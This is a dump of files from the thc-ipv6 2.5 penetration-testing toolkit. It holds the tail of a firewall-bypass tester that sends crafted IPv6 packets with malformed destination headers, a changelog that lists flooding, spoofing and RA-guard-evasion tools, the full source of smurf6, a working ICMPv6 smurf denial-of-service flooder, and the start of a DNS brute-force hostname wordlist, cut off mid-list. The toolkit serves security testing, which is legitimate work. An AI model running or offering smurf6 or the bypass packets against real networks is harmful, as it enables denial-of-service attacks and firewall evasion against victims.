ICMP6_ECHOREQUEST, 0, count, hdr->pkt + hdr->pkt_len - 20, 20, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); pingtest = 1; check_for_reply(); pingtest = 0; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); memset(buf, 0, sizeof(buf)); curr++; } if (only == ++count || only == 0) { printf("Test %2d: Bad TLV handling #2 reverse\t", count); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; buf[0] = 1; // T buf[1] = 12; // L if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 12; // L buf[6] = NXT_ICMP6; // fake dst hdr buf[7] = 3; // 32 byte length of fake hdr, jumping over 24 byte of tcp hdr buf[8] = 1; // T fake buf[9] = 28; // L fake if (thc_add_hdr_dst(pkt, &pkt_len, buf, 14) == -1) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ECHOREQUEST, 0, count, NULL, 0, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt2; memset(hdr->pkt + hdr->pkt_len - 12, 0, 4); if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, hdr->pkt + hdr->pkt_len - 12, 12) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); pingtest = 1; check_for_reply(); pingtest = 0; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); memset(buf, 0, sizeof(buf)); curr++; } if (only == ++count || only == 0) { i = 0; ch = 'a'; is_srcport = 1; if (udp == 0) { while (sports[i] != -1) { printf("Test %2d%c: plain with srcport %d \t", count, ch++, sports[i]); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_tcp(pkt, &pkt_len, sports[i], port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); i++; } } else { while (sports2[i] != -1) { printf("Test %2d%c: plain with srcport %d \t", count, ch++, sports2[i]); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, sports2[i], port, 0, buf, 1000) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); i++; } } curr++; is_srcport = 0; } /* ----------------- END OF TEST CASES ---------------- */ printf("\nDone.\n"); thc_pcap_close(p); return 0; } thc-ipv6-2.5/CHANGES0000644000000000000000000005057012256501006012515 0ustar rootrootCHANGELOG ========= NOTE: More tools exist, but are only handed out to specific people who develop ipv6 security/pentest tools themselves, or support the thc-ipv6 toolkit development. If this matches *you* send me an email to vh (at) thc (dot) org , with "thc-ipv6 antispam" in the subject line. v2.5 public release (30C3) => see 2.4 v2.4 private release * Moved the license from GPLv3 to AGPLv3 (see LICENSE file) * Support for big endian processors added * Added new tool: fuzz_dhcps6 - DHCPv6 server fuzzer. Submitted by Brandon Hutcheson and Graeme Neilson - great job, thanks! * Added new tool: flood_redir6 - flooding with ICMPv6 redirects * Added new tool: flood_rs6 - flooding with ICMPv6 Router Soliciations * Added new tool: four2six - send an IPv4 packet via a 4to6 gateway * Added new tool: dump_dhcp6 - show all DHCP6 servers and their config * Added new script: six2four.sh - send an IPv6 packet via a 6to4 gateway * All flooding tools: - support now a specific target instead of all local nodes - printing a dot for each 1000 packets sent (before: 100) * alive6: - renamed option -D to -C (common address scan), -D still works too - added -4 IPv6address/range option - added -H option to print the hop count value of received packets - added -L option to only report local alive systems - added -P option to only print addresses that would be scanned, but no scanning - added -R option to not consider TCP-RST packets as alive signals - NDP alives now also get their MAC addresses printed - reworked help output, simple help screen with no option, full help with -h parameter - clarified that ranges (from-to) should not be used together with -D -M or -4 - -W option waited for micro not milliseconds, fixed * flood_router26 - added -S slow start option which makes the flooding a bit more effective - added -G gigantic packet option (64kb, fragmented) - increased number of route/prefix entries in normal (non -G option) packets - rewrote the help screen * thcsyn6: - changed to also allow syn flooding on link local * parasite6: - added ROUTER flag to all packets to prevent being removed from the routing list * trace6: - added -u UDP switch - fixed bug that showed targets sometimes too far away - fixed -E option - fixed millisecond printing * thcping6: - added -n count switch - added -T icmptype and -C icmpcode options - rewrote help output, added -h extra output, minimal otherwise * dnsdict6: - enhanced and updated the dictionaries - added additonal "u"ber large dictionary with -u option * fragmentation6: - added multi-level-fragment tests - no screen flooding in flooding mode anymore * fake_solicitate6 - src address is now by default the own link-local address unless specified different * firewall6: - added -H option to show hop count of pkts received * randicmp6: - added -p option which will not print replies and not wait (good for flooding tests) * thc-ipv6-lib: - added thc_add_ipv4_rudimentary function needed for the new four2six tool, so far only ICMPv4 ping and UDP is supported. - renamed thc_create_ipv6 to thc_create_ipv6_extended, and added a simpler thc_create_ipv6 function - 801.q VLAN IDs can now have the proper range of up to 4095 - injection sniffing - some tcpdump seem not to be able to sniff on ether proto * massive error checking and compiler warnings eliminated * Updated documentation and man page * Incorporated Debian maintainer patches: man page additions and spelling fixes v2.3 public release (released) v2.2 private release * Added new tool: thcsyn6 - a TCP flooding tool * Added new tool: redirsniff6 - redirects traffic (sniff variant to redir6) * Added new script: thc-ipv6-setup.sh - configuring Linux for thc-ipv6 * Added new script: 6to4test.sh - check an ipv4 address for dynamic 6to4 tunnel * flood_router26: added -s option for small lifetime which makes the attack even more devasting * trace6: - added -B option for sending echo reply packets (will not show the destination) - added -E option for sending destination headers with invalid option * thcping6: - -U/-S port options now also set the source port - -U/-S options now also send data if given - -f fragment option can now be used multiple times * implementation6: - fixed bug in test case - added icmp6 type/code printing for error replies * fake_advertise6: more command line options to control all necessary aspects * toobig6: added -u option to allow testing for unrelated ICMPv6 packet firewall bypasses * firewall6: added more test cases * thc-ipv6-lib: - fixed address selection bug if both global and ULA addresses were present - changed NDP to use ff02::1:ffxx:xxx limited multicast addresses - thc_resolve6 ignores now anything after a "/" or in before/after "[]" * copied alive26 to alive6 * in new alive26: - hidden portscan option (-s "portscan") to be able to TCP-SYN portscan in injection environments - new option -x to define the source port for tcp and udp packets - new option -T allows sending a fixed string as a packet tag in the data v2.1 * alive6 + alive26: ranges are now supported in the input file too * added dnssecwalk to the thc-ipv6 package and included IPv6+IPv4 resolving * parasite6: enhancements to make it way more effective * fake_router26: added overlap RA guard evasion type (-E o, -E O) * dos-new-ip6: fix that only DAD replies are sent, not full NDP spoofing :-) (thanks to Johannes Weber for reporting) * flood_router26: Added local LAN privacy extension prevention attack by George Kargiotakis * randicmp6: - added function which dumps icmp answers received - added funtionality to send a specific type (and also code) * dnsdict6: added SRV result address resolving * trace6: fix for routers which add padding to the packets * fuzz_ip6: added -X option for not sending a transport layer * firewall6: - two more overlapping test cases - source port test cases * fake_advertise6: when no srcmac was specified, it was sent as all zeroes instead of the real mac (thanks to Jannes Weber for reporting) * inject_alive6: added -a option to allow selective active alive sending * thc-ipv6-lib: added function thc_send_as_overlapping_{first,last}_fragment6 * Added GPL exception clause to license to allow linking to OpenSSL - debian people need this * Makefile: added patch from gentoo maintainers v2.0 - PUBLIC * Added VLAN-Q, PPPoE and 6in4 injection support! See the file HOWTO-INJECT for details * added new tool: inject_alive6 - keeps a PPPoE/6in4 tunnel alive if you disconnect the client tunnel endpoint * added new tool: ndpexhaust26 - very performant ndp exhauster based on ICMP error toobig messages but can send many types of packets * added new tool: firewall6 - various TCP/UDP ACL bypass test cases * added new tool: fake_pim6 - send fake hello and join/prune pim messages * alive26: - added support for replies with fragmentation header - -s/-a/-u options would send also bad dst hdr packets, fixed - having a '-' in the dns name was not working * trace6: - added -b option for stealthy tracerouting - fixed -a option reply packet analysis - added -F and -D options to add frag & dst headers, not documented - if the destination is not reached, print three ??? entries and warn * thcping6: - added -D xxx fragmenting large destination header option - added -q for hop-by-hop quickstart option * fake_dns6d: specified a wrong listen port, silly me * fake_router26: added -L DNS searchlist option * fuzz_ip6: - RA: added DNS searchlist, and extended flag options - added node information query fuzzing (-0), renamed TCP fuzzing to -s * toobig6: no restriction on mtu value anymore * dnsrevenum6: switched the output printing order * exploit6: fixed a crash in test case 4 * implementation6: enhancements to not run into icmp error rate limiting * thc-ipv6-lib: - more intelligent source address selection - fixed crash in toobig function - better support of broken fragmentation implementations - added thc_add_pim() function and overall PIM packet creation * OpenSSL is now optional, if not present, comment out HAVE_SSL in the Makefile * added trace62list.sh and create_network_map.sh to create network topology map images from trace6 output files v1.9 - PUBLIC * added new tool: detect_sniffer6 (Windows, Linux, *BSD, OS X, ...) * added new tool: connect6 for various IPv6 TCP connection stuff * added new tool: fake_router26 which gives more control on options * added new tool: dnsrevenum6 which reverse enumerates the DNS * added new tool: inverse_lookup6 which gets the IPv6 addresses of a mac address * added new tool: fake_solicitate6 which lets you fake neighbor solicate packets * added new tool: address6 converts between ipv6 <=> ipv4 and mac addresses * added new tool: flood_router26, more effective by many prefix & route entries in each packet * added new tool: passive_discovery6 which detects all sending systems and includes DAD detection * alive26: - new -I srcip6 option to allow choosing the source IPv6 address to use - fixed a bug in alive26 for hop-by-hop option - expanded waiting time for link local scans - now returns 0 when hosts were found alive, 1 when not (for alive scripting) * parasite6: - fixed a crash when -F and -R were used together - parasite6 now terminates as it should, also ending childrens when using -l - the mac command line parameter was not working * fuzz_ip6: - added TCP (-0 port) to the fuzzer with tstamp, mss + wscale options - return code 0 on tests done and target alive, 1 on target crashed * thcping6: - added -U udp option - return code -1 no reply, 0 reply, 1 error reply * implementation6: - added more tests (AH + ESP ping tests, 8k exthdr, 2k exthdr size) - fixes for some tests - returns -1 on errors, 0 if at least one reply, 1 if no or only error replies * detect-new-ip6: now the interface is passed as 2nd cmdline option to the script * dnsdic6: - added full SRV service scan support (-S option) - fix for x64 systems, thanks to alphacc(at)altern(dot)org - some more minor fixes * trace6: - fixed a crash - made it a bit faster - fix for targets further away than 18 hops - enhanced error messages * kill_router6: fixed '*' target option * dos-new-ip6: also DOSes non-link-local addresses now * toobig6: fixed crash when mtu size specified was < 47 * send errors dont result in program exits for flood_*, fuzz_ip6 and ndpexhaust6 tools anymore * thc-ipv6-lib: - changed the thc_pcap_function to * have a an addition parameter, promisc (before it was not promiscous) * reduce CPU load, which affects detect-new-ip6, dos-new-ip6 and parasite6 - changed some function defines from/to signed/unsigned * cleaned up the code v1.8 - PUBLIC * included all tools except alive26 v1.7 - PRIVATE * fake_advertise6: added one more ND Security bypass (-D) * fake_router6: - added unicast reply to router solicitation requests - added one more ND Security bypass (-D) * parasite6: - added -R option to also inject the reverse route - added one more ND Security bypass (-D) * flood_router6: one more RA guard bypass (-D) * alive26: - important fix for hopbyhop/dst header packet types (ff02::1)! - expanded dictionary by results from the ipv6 world day scanning * dnsdict6: - expanded dictionary by results from the ipv6 world day scanning - added IPv4 support for selfish reasons. I'm sorry! ;-) * thcping6: - -D renamed to -F - new -D/-H option to specify options in hopbyhop and destination headers - fragment header moved before other headers (except hop-by-hop) * added new tool flood_solicitate6 * added new tool kill_router6 * added new tool fake_dnsupdate6 * added new tool node_query6 * added new tool dump_router6 * added new tool sendpeesmp6 by Marcin Pohl * added new tool randicmp6 by ecore * added new tool ndpexhaust6 by mario fleischmann * added two alternate alive6/parasite6 tools by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho, it can be found in the contrib/ directory * added helper scripts extract_{network,host}s.sh * speed improvements for flood_* tools * added nmap support to dnsdictalive.sh (needs at least v5.59BETA) * thc-ipv6-lib: - fixed class assignment to ipv6 packet creation - forgot some fclose()es thanks to mario fleischmann for reporting - first OS/X porting diff sent in by oskar (at) acm (dot) org, thanks! v1.6 - PUBLIC * removed various tools for public release v1.5 - PRIVATE * redir6: - TTL enhancement by frederik(at)kriewitz(dot)eu - timing enhancement by me * toobig6: added TTL, timing and packet size enhancement * parasite6: - added -l (loop) option - ND security evasion added :-) * fake_advertise6: - added src ip option - added ND security evasion options * trace6: - added tunnel detection and identification mode (-t) - only up to the 13th hop was reported, fixed - added patch by Phillipe Langlois for -s sourceipv6 option * alive26: - print original dst ports for packet replies - print original dst ipv6 for icmp errors - if -p was specified, sending dst opt error pkt was not disabled * thcping6: rewrote thcping6 for more options and packet timing * fake_router6: - the interface MTU is used as default now - added RA guard evasion options * flood_router6: RA guard evasion options added :-) * frag_id_attack: lots of more tests and cmdline options * implementation6: more test cases * dnsdict6: - implemended 4 different wordlists in dnsdict6 (-s, -m, -l, -x switches) - better wildcard detection - added -d switch to dump IPv6 NS and MX information - added check for -t max * added comfortable dnsdictalive.sh script to dnsbrute+alivescan a domain * thc-ipv6-lib: - added thc_ipv62notation function - added thc_add_hdr_oneshotfragment function - fixed neighbor mac solicitation function for FreeBSD targets - better own ipv6 address selection * added usage of thc_ipv62notation function to all tools v1.4 - December 2010 - PUBLIC * removed various tools for public release v1.3 - PRIVATE * added covert_send6 and covert_send6d * added fake_dhcps6 - fake dhcp6 server * added flood_dhcpc6 - dhcp6 flooder * added fake_dns6 - fake dns server, serving only one ipv6 address :-) * added fake_mld26 (same as fake_mld6 but for MLDv2) * added flood_mld6 - flood network with mld messages * added flood_mld26 - flood network with mldv2 messages * added fake_mldrouter6 - fake an mld router * added flood_mldrouter6 - flood network with mld router messages * added exploit6 and the first test cases * added denial6 and the first test cases * added dos_mld.sh which disables outside multicast traffic to the local LAN * alive6: - beautified alive ipv6 address output - added -i inputfile and -o outputfile options - added -M for mac enumeration mode (autoconfiguration address space) - added -D for dhcp6 enumeration mode - added range possibility, e.g. "alive6 eth0 2002:0-2:0-10" - added -s/-a-/-u TCP SYN/ACK and UDP alive scan mode - added -F firewall quick port setup mode (tcp-syn to 22, 25, 80, 443; udp dns request; tcp-ack to highport, ping and destination error) - added -p and -e icmp and error alive check modes - changed hop-by-hop error check to destination error check - alive reply type is now printed - printing now warnings if icmp destination unreachables are received (-v) - added new -S slow, -W waittime,-d resolve, -v verbose switches - added new -Z dstmac option - removed hop check, changed to dst hdr, and made it the default - removed memory leaks * fake_mld6: - added query and done MLD types - new command line option -l = loop - command line format changed - added target mac option, needed for new vulnerablity found * dnsdict6: - added 87 more entries to the dictionary - now identified even multiple wildcard IPs and displays them accordingly - now prints the number of unique IPv6 addresses founds * fuzz_ip6: - added fuzzing query, report and done MLD + query and report MLDv2 types - fuzzing first and last two bytes of IPv6 addresses in the packets - command line option for specifying an IPv6 address within the packets - added many options * trace6: - added unreachable detection - added more informative output - now multiple run save - fixed a core dump which happened on rare occasions * changed command line options for fake_router6 to allow specification of DNS * toobig6: tighter mtu and removed debug output still present in the code, oops * implementation6: added three more test cases, enhanced four test cases, bugfix * compile warning fixes (dnsdict6, sendpees6, thc-ipv6-lib) * Makefile beautification and header fixes by xmwgentooorg * library: - BUG: raw mode does not work! Needs to be implemented properly by someone :-) - imporant fix for gathering a local mac, required for Mac OS/X targets - added thc_pcap_init_promisc function (required for new fake_mld6 functionality) - added thc_is_dst_local function (required for new alive6 functionality) - added thc_add_udp function (required for new alive6 functionality) - added thc_bind_udp_port function (required for fake_dhcps6) - added thc_bind_multicast_to_socket (required for fake_dhcps6) - added thc_ipv6_show_errors function to toggle error messages from library - optimization in thc_send_as_fragment6 to only get MACs once :-) - fix for max offset in thc_add_hdr_fragment, plus bad value check - fix for beautification ipv6 address output function - looked for memory leaks and removed all I found - for performance reasons also stale neighbor mac entries are used now - made library thread safe, for this to work I: ~ changed thc_pcap_check/thc_pcap_function to add an option ~ removed some global variables => remaining variables are ok to be global v1.2 - June 2010 * compile fixes * test case added to implementation6 v1.1 - June 2010 * dnsdict6: big wordlist update * upgraded thc-ipv6 license to GPLv3 v1.0 - May 2010 - PRIVATE * beta release v0.9 - April/May 2010 - PRIVATE * added dnsdict6 * added trace6 * added flood_router6 * added flood_advertise6 * added fuzz_ip6 * added implementation6d * implementation6: - renamed from test_implementation6 - added A LOT of test cases and reply checks * fake_router6: - changed command line options - added default route entry (not supported by many systems though) - added DNS server ip (the official dns multicast address) - small fixes * alive6: - small fixes - added -l switch for using the link layer address * library: - fixed a big bug in the routing module, library thought sometimes a remote network is local! - fixed a bug where a hard/permanent set mac for a destination would not be found when the dst is not alive - now chooses an alternate IP6 address when the prefered one is not available (link vs. global) - fixed TTL setting when using raw mode - supporting mobile home address option in dst option (for checksum) - pcap was opened in promisc mode - shouldnt have been, unnecessary - valid icmp checksum for mobile home address and routing pointer == 0 - TCP can be now added as a header too + checksum calculation, but not for inverse_packet (yet - no application for that currently). v0.8 - June 2007 - PRIVATE * Clarified License: GPL 2 * Improved Makefile * Added a man page for all tools together (by gebi(at)grml.org) v0.7 - AUGUST 2006 - BETA * Added sendpees6.c and a patch from willdamn@gmail.com - thanks a lot! (its a new DOS attack) v0.6 - MARCH 2006 - BETA * Added fake_mipv6 tool to spoof mobile ipv6 binding updates * Fixed a bug in the thc_toobig6 and some other thc_ icmp6 lib functions v0.5 - FEBRUARY 2006 - ALPHA * Added RAW mode, just add -r as 1st option to most tools v0.4 - FEBRUARY 2006 - ALPHA * Added fake_mld6 tool v0.3 - JANUARY 2006 - ALPHA * Added detect-new-ip6 tool * Added function to get the mac from the ipv6 neighbor cache, thanks to dan kaminsky * It finally has a README which describes the thc-ipv6-lib.c interface (roughly though, but anyway, now there is at least *something*) v0.2 - NOVEMBER 2005 - ALPHA * First release thc-ipv6-2.5/smurf6.c0000644000000000000000000000360312251022441013077 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip [multicast-network-address]\n\n", prg); printf("Smurf the target with icmp echo replies. Target of echo request is the\n"); printf("local all-nodes multicast address if not specified\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[16], fakemac[7] = "\x00\x00\xde\xad\xbe\xef"; unsigned char *multicast6, *victim6; int pkt_len = 0; char *interface; int rawmode = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } victim6 = thc_resolve6(argv[2]); if (argv[3] != NULL) multicast6 = thc_resolve6(argv[3]); else multicast6 = thc_resolve6("ff02::1"); memset(buf, 'A', 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, victim6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting smurf6 attack against %s (Press Control-C to end) ...\n", argv[2]); while (1) thc_send_pkt(interface, pkt, &pkt_len); return 0; } thc-ipv6-2.5/dnsdict6.h0000644000000000000000000112546512251022433013415 0ustar rootroot/* * dnsdict.h (c) 2013 by van Hauser / THC * */ // built-in list of hostnames char *sub_small[] = { "6", "6net", "6to4", "admin", "blog", "blog6", "dev", "dns", "dns1", "dns2", "email", "exchange", "firewall", "ftp", "fw", "gate", "gateway", "gw", "gw6", "host", "host1", "host10", "host11", "host12", "host2", "host3", "host4", "host5", "host6", "host7", "host8", "host9", "imap", "ip6", "ipv6", "ipv6-gw", "ipv6-router", "ipv6gw", "irc", "mail", "mail1", "mail2", "mail3", "mail6", "mailgate", "mailhost", "mx", "mx1", "mx2", "mx3", "mx6", "net", "news", "ns", "ns1", "ns2", "ns3", "nsv6", "ntp", "ntp1", "office", "owa", "pc1", "pc2", "pc3", "pop", "pop3", "portal", "proxy", "remote", "router", "secure", "server", "server1", "smtp", "smtp2", "sql", "support", "test", "time", "tunnel", "v6", "v6gw", "v6www", "video6", "vpn", "vps", "web", "web1", "webmail", "wiki", "www", "www-6", "www-ipv6", "www-v6", "www1", "www2", "www6", "wwwipv6", "wwwv6", "" }; char *sub_medium[] = { "0", "1", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1d", "1e", "1f", "2", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "2b", "2c", "2d", "2e", "2f", "3", "30", "31", "32", "33", "34", "35", "36", "37", "38", "39", "3b", "3c", "3d", "3e", "3f", "4", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "4c", "4d", "4e", "4f", "5", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "5b", "5c", "5d", "5e", "5f", "6", "60", "61", "62", "63", "64", "65", "66", "67", "68", "69", "6b", "6c", "6d", "6e", "6f", "6net", "6test", "6to4", "7", "70", "71", "72", "73", "74", "75", "76", "77", "78", "79", "7b", "7c", "7d", "7e", "7f", "8", "80", "81", "82", "83", "84", "85", "86", "87", "88", "89", "8c", "8d", "8e", "8f", "9", "90", "91", "92", "93", "94", "95", "96", "97", "98", "99", "9b", "9c", "9d", "9e", "9f", "a", "a0", "a1", "a2", "a20", "a3", "a4", "a5", "a6", "a7", "a8", "a9", "aa", "aaa", "ab", "abc", "ac", "access", "ad", "admin", "adns1", "adsl", "ae", "ae-0", "ae-1", "ae-2", "af", "agenda", "agent", "ak", "alice", "allen", "alpha", "amanda", "ams-core-1", "antares", "ap", "apache", "api", "apollo", "app", "app1", "apple", "apply", "apps", "ar01", "ar02", "ares", "as", "as0", "as1", "asterix", "athena", "atlantis", "atlas", "atom", "auth", "autodiscover", "av", "avalon", "b", "b0", "b1", "b2", "b3", "b4", "b5", "b6", "b7", "b8", "b9", "ba", "backup", "backups", "banana", "barracuda", "bart", "bb", "bbs", "bbs6", "bc", "bcast", "bd", "be", "bender", "beta", "bf", "billing", "black", "blade", "blog", "blog6", "blogs", "blue", "bm0", "bm1", "bm2", "bnc", "bob", "bot", "brain", "broadcast", "bt", "bt6", "bug", "bugs", "bugzilla", "build", "c", "c0", "c1", "c2", "c3", "c4", "c5", "c6", "c7", "c8", "c9", "ca", "cache", "calendar", "callisto", "calypso", "cam", "cas", "casper", "cat", "catalog", "cb", "cc", "ccxvii", "cd", "ce", "centos", "cert", "cf", "cgi", "ch", "charlie", "charon", "chat", "chicago", "chris", "chronos", "ci", "ci53", "ci96", "cisco", "cisco2", "citrix", "client", "cloud", "clyde", "cm0", "cm1", "cms", "cn", "code", "conf", "conference", "connect", "console", "contact", "core", "core1", "correo", "cp", "cr1", "cr2", "cricket", "crm", "cs", "customer", "cvs", "d", "d0", "d1", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", "d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d69", "d7", "d70", "d72", "d73", "d74", "d76", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "data", "db", "db1", "db2", "dc", "dd", "de", "debian", "decix", "defiant", "dell", "delta", "demo", "demon-gw", "desktop", "dev", "devel", "df", "dh", "dhcp", "dhcp-pool", "diana", "dict", "dione", "directory", "dl", "dns", "dns0", "dns01", "dns02", "dns1", "dns2", "dns3", "dns4", "dnscache1", "dnscache2", "doc", "docs", "download", "downloads", "dragon", "drupal", "ds", "dsl", "e", "e0", "e1", "e2", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eagle", "earth", "eb", "ec", "echo", "ed", "edge", "edu", "ee", "ef", "efnet", "em", "email", "en", "eng", "enigma", "enterprise", "epp", "eprints", "es", "et", "eth0", "eth1", "europa", "eve", "events", "ex", "exchange", "exeter", "extranet", "f", "f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa0-0", "falcon", "fax", "fb", "fc", "fd", "fe", "fe0-0", "ff", "fi", "fiberlink", "fido", "files", "finger", "firewall", "flash", "flow", "forum", "forums", "fox", "foxtrot", "frank", "fred", "freebsd", "fry", "fs", "ftp", "ftp1", "ftp2", "ftp3", "ftp6", "fw", "fw1", "fw2", "g", "gaia", "galatea", "gallery", "gamma", "gandalf", "gate", "gatekeeper", "gateway", "gauss", "gc", "ge-0", "gemini", "gentoo", "gh", "git", "gk", "go", "gold", "golf", "gopher", "green", "guest", "guide", "gw", "gw01", "gw1", "gw2", "gw6", "h1", "ha", "hades", "hal", "he", "helene", "help", "helpdesk", "hera", "hermes", "hg", "hh", "hobbes", "home", "homer", "host", "host1", "host10", "host11", "host12", "host13", "host14", "host15", "host16", "host17", "host18", "host19", "host2", "host20", "host21", "host22", "host23", "host24", "host25", "host26", "host27", "host28", "host29", "host3", "host30", "host31", "host32", "host33", "host34", "host35", "host36", "host37", "host38", "host39", "host4", "host40", "host41", "host42", "host43", "host44", "host45", "host46", "host47", "host48", "host49", "host5", "host50", "host51", "host52", "host53", "host54", "host55", "host56", "host57", "host58", "host59", "host6", "host60", "host61", "host62", "host63", "host64", "host65", "host66", "host67", "host68", "host69", "host7", "host70", "host71", "host72", "host73", "host74", "host75", "host76", "host77", "host78", "host79", "host8", "host80", "host81", "host82", "host83", "host84", "host85", "host86", "host87", "host88", "host89", "host9", "host90", "host91", "host92", "host93", "host94", "host95", "host96", "host97", "host98", "host99", "hosting", "hotel", "hotspot", "hp", "hq", "http", "hwmaint", "hydra", "hyperion", "i", "ice", "ict", "id", "idp", "ids", "if-0-0-0", "if-10-0-0", "ik", "im", "images", "imap", "imap4", "imaps", "img", "inferno", "info", "int", "intern", "internal", "internet", "intra", "intranet", "io", "ip", "ip00", "ip01", "ip02", "ip03", "ip04", "ip05", "ip06", "ip07", "ip1", "ip10", "ip11", "ip12", "ip13", "ip14", "ip15", "ip2", "ip3", "ip4", "ip5", "ip6", "ip6test", "ip7", "ip8", "iphone", "iptv", "ipv4", "ipv6", "ipv6-gw", "ipv6-router", "ipv6gw", "ipv6test", "irc", "irc6", "ircd", "iris", "irssi", "is", "isis", "it", "ix", "ix-2-2", "j", "jabber", "janus", "java", "jg", "jobs", "jupiter", "k", "kb", "kdc1", "kepler", "kerberos", "keyserver", "king", "kk", "kst-core-1", "l0", "l1", "lab", "labs", "lan", "laptop", "lc", "ldap", "ldap1", "ldap2", "learn", "leo", "lg", "lib", "library", "lim-core-1", "linux", "lisa", "list", "listes", "lists", "listserv", "live", "lo-1", "lo0", "lo0-0", "lo1", "local", "localhost", "log", "logger", "loghost", "login", "logs", "loki", "london", "loop0", "loopback0", "lotus", "lu", "lxxxix", "m", "m1", "mail", "mail01", "mail02", "mail03", "mail1", "mail10", "mail11", "mail12", "mail2", "mail3", "mail4", "mail5", "mail6", "mail7", "mail8", "mail9", "mailer", "mailgate", "mailgw", "mailhost", "mailin", "mailing", "mailout", "mailserver", "mailtest", "main", "manage", "management", "map", "maps", "mars", "marvin", "master", "max", "maxwell", "me", "media", "member", "members", "mercury", "merlin", "meta", "mickey", "mike", "miranda", "mirror", "mirrors", "ml", "mm", "mobile", "mon", "monitor", "monitoring", "moodle", "moon", "mordor", "moria", "mout", "mp3", "mr", "mrtg", "ms", "ms1", "mta", "mta1", "mta2", "munin", "music", "mx", "mx0", "mx01", "mx02", "mx03", "mx1", "mx10", "mx11", "mx12", "mx13", "mx14", "mx15", "mx16", "mx17", "mx18", "mx19", "mx2", "mx20", "mx21", "mx22", "mx23", "mx24", "mx25", "mx26", "mx27", "mx28", "mx29", "mx3", "mx30", "mx31", "mx32", "mx33", "mx34", "mx35", "mx36", "mx4", "mx5", "mx6", "mx7", "mx8", "mx9", "my", "mysql", "mysql1", "n", "na", "nagios", "name", "nat", "neon", "neptun", "neptune", "net", "netlab", "network", "new", "news", 